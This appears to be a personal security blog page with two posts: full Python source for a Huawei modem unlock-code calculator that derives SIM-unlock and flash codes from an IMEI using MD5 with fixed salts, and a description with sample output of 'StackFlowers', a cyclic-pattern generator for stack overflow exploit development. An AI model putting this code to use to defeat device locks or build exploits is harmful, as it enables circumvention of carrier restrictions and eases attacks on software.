break a time, with break the c0de…

Posts tagged “program

Huawei modem unlock calculator


Any time i’ve been using modem (i use huawei e169) for my internet connections. because i like the flexibility and realibility for use on my notebook. but 2 days ago, i was late to pay the bill and my connection was disconnected. i read the bill, and the bill was so high than other provider. i want to move to other provider, but i can’t. because the modem was locked by provider and only can using the sim card from the provider. yes i hear there is any way to unlock the modem, but i must pay at the service. because of that i’m doing some research and looking for the unlock code algorithm used by huawei modem. and i got it and did it in my program. now i can freely use any sim card on my modem. here it is, the source code contains the algorithm or you can use by direct or import it to your own program ;) . hope you enjoy !

#!/usr/bin/python
# -*- coding: utf-8 -*-
#   This library is free software; you can redistribute it and/or
#   modify it under the terms of the GNU Lesser General Public
#   License as published by the Free Software Foundation; either
#   version 2.1 of the License, or (at your option) any later version.
#
#   This library is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
#   Lesser General Public License for more details.
#
#   You should have received a copy of the GNU Lesser General Public
#   License along with this library; if not, write to the
#      Free Software Foundation, Inc.,
#      59 Temple Place, Suite 330,
#      Boston, MA  02111-1307  USA
#
#   Copyright 2010 Gunslinger_ <yudha.gunslinger@gmail.com>
#   http://bit.ly/c0debreaker

import hashlib, string

__author__	= "Gunslinger_ <yudha.gunslinger@gmail.com>"
__date__ 	= "Tue, 14 Jun 2011 23:22:42 +0700"
__version__ 	= "1.0"
__copyright__ 	= "Copyright (c) 2010 Gunslinger_"

class huawei_modem_unlocker(object):
	"""
	Instance variables:

	Imei
		Imei of the modem will be calculated
		Default : '0'

	Verbose
		Display how algorithm working
		Default : False

	"""
	def __init__(self, imei='0', verbose=False):
		''' Huawei modem unlocker class constructor '''
		self._imei 		= imei
		self._verbose		= verbose
		self._md5u 		= hashlib.md5(str(imei)+str('5e8dd316726b0335')).hexdigest()
		self._md5f 		= hashlib.md5(str(imei)+str('97b7bc6be525ab44')).hexdigest()
		self._unlock_code 	= ''
		self._flash_code 	= ''
		# verbose formating
		self._width		= 21
		self._w			= 10
		self._header_format 	= '%-*s%*s'
		self._format       	= '   %d  | %-*s | %*s  '

	def xor_digits(self, source, counter):
		''' Get a value and xoring it during looping iteration '''
		digits = int('0x0'+source[0+counter:2+counter],16)	^ \
			 int('0x0'+source[8+counter:8+2+counter],16)	^ \
			 int('0x0'+source[16+counter:16+2+counter],16) 	^ \
			 int('0x0'+source[24+counter:24+2+counter],16)
		return digits

	def calc(self):
		''' Process calculate with the algorithm (read source code) '''
		cnt = 0
		cnt2 = 1
		if self._verbose:
			print "="*(self._width+13)
			print " Iter."+"|"+ " Unlock byte "+"|"+" Flash byte "
			print "-"*(self._width+13)
		while cnt < 8:
			digits_unlock 	= self.xor_digits(self._md5u, cnt)
			digits_flash 	= self.xor_digits(self._md5f, cnt)
			unlock_byte 	= string.zfill(hex(digits_unlock)[2:],2)
			flash_byte	= string.zfill(hex(digits_flash)[2:],2)
			self._unlock_code = str(self._unlock_code)+str(unlock_byte)
			self._flash_code  = str(self._flash_code)+str(flash_byte)
			if self._verbose: print self._format % (int(cnt2), self._width - self._w, self._unlock_code , self._w, self._flash_code)
			cnt  +=2
			cnt2 +=1
		if self._verbose:
			print "="*(self._width+13)
			print "\nUNLOCK CODE = %d & %d | %d = %d" % (int('0x0'+self._unlock_code,16), 33554431, 33554432, eval("int('0x0'+self._unlock_code,16) & 33554431 | 33554432"))
			print "FLASH CODE  = %d & %d | %d = %d\n" % (int('0x0'+self._flash_code,16), 33554431, 33554432, eval("int('0x0'+self._flash_code,16) & 33554431 | 33554432"))
		self._unlock_code 	= int('0x0'+self._unlock_code,16) & 33554431 | 33554432
		self._flash_code 	= int('0x0'+self._flash_code,16) & 33554431 | 33554432
		return (self._unlock_code, self._flash_code)

	def run(self):
		''' Fire it up ! '''
		self.calc()
		return (self._unlock_code, self._flash_code)

if __name__ == '__main__':
	print "\nHuawei modem unlock code calculator v.%s by %s \n" % (__version__, __author__)
	inpimei = raw_input("Please input modem IMEI : ")
	cracker = huawei_modem_unlocker(inpimei)
	a, b 	= cracker.run()
	print "\n-> IMEI		= %s" % (inpimei)
	print "-> UNLOCK CODE	= %s" % (a)
	print "-> FLASH CODE	= %s" % (b)
Advertisements

StackFlowers | let’s flow it with the flowers


StackFlowers is a program that create pattern at the buffer, calculate pattern offset, write pattern buffer into specific variable name & programming language. Used for stack overflow exploit development.

Preview :

Nicely i’ve been created stand alone win32 executable for direct use of win32 exploit development.

in this example, we create 5000 bytes of pattern. to know how bytes eip overwriten exactly
this option will create pattern 5000 bytes.

gunslinger@c0debreaker:/media/disk/stackflowers$ ./StackFlowers.py -c -s 5000

StackFlowers v.0.8 by Gunslinger_ <yudha.gunslinger@gmail.com>
		    ,
		.--'|}
	       /    /}}
	     .=\.--'`\}
	    //` '---./`
	    ||  /|
	     \\| |
	   |\_\\/
	   \__/\\
		\\
		 \| "Lets flow with the flowers"

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk

Output has been saved in StackFlowers.log

gunslinger@c0debreaker:/media/disk/stackflowers$

or we can use it direct to write the pattern into specific variable & programming language.
this options will create 5000 bytes of pattern with variable name “buffer” with python programming style. and split the pattern every 50 bytes.

StackFlowers v.0.8 by Gunslinger_ <yudha.gunslinger@gmail.com>
		    ,
		.--'|}
	       /    /}}
	     .=\.--'`\}
	    //` '---./`
	    ||  /|
	     \\| |
	   |\_\\/
	   \__/\\
		\\
		 \| "Lets flow with the flowers"

buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab"
buff += "6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"
buff += "d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"
buff += "Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"
buff += "6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A"
buff += "i3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"
buff += "Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al"
buff += "6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A"
buff += "n3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9"
buff += "Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
buff += "6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2A"
buff += "s3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
buff += "Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av"
buff += "6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A"
buff += "x3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9"
buff += "Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba"
buff += "6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2B"
buff += "c3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9"
buff += "Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf"
buff += "6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
buff += "h3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9"
buff += "Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk"
buff += "6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2B"
buff += "m3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9"
buff += "Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp"
buff += "6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B"
buff += "r3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9"
buff += "Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu"
buff += "6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2B"
buff += "w3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9"
buff += "By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz"
buff += "6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C"
buff += "b3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9"
buff += "Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce"
buff += "6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2C"
buff += "g3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9"
buff += "Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj"
buff += "6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2C"
buff += "l3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9"
buff += "Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
buff += "6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2C"
buff += "q3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9"
buff += "Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct"
buff += "6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2C"
buff += "v3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9"
buff += "Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy"
buff += "6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2D"
buff += "a3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9"
buff += "Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd"
buff += "6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D"
buff += "f3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9"
buff += "Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di"
buff += "6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2D"
buff += "k3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9"
buff += "Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn"
buff += "6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2D"
buff += "p3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9"
buff += "Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds"
buff += "6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2D"
buff += "u3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
buff += "Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx"
buff += "6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2D"
buff += "z3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9"
buff += "Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec"
buff += "6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2E"
buff += "e3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9"
buff += "Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh"
buff += "6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2E"
buff += "j3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9"
buff += "El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em"
buff += "6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2E"
buff += "o3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9"
buff += "Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er"
buff += "6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2E"
buff += "t3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9"
buff += "Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew"
buff += "6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2E"
buff += "y3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9"
buff += "Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb"
buff += "6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F"
buff += "d3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9"
buff += "Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg"
buff += "6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2F"
buff += "i3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9"
buff += "Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl"
buff += "6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2F"
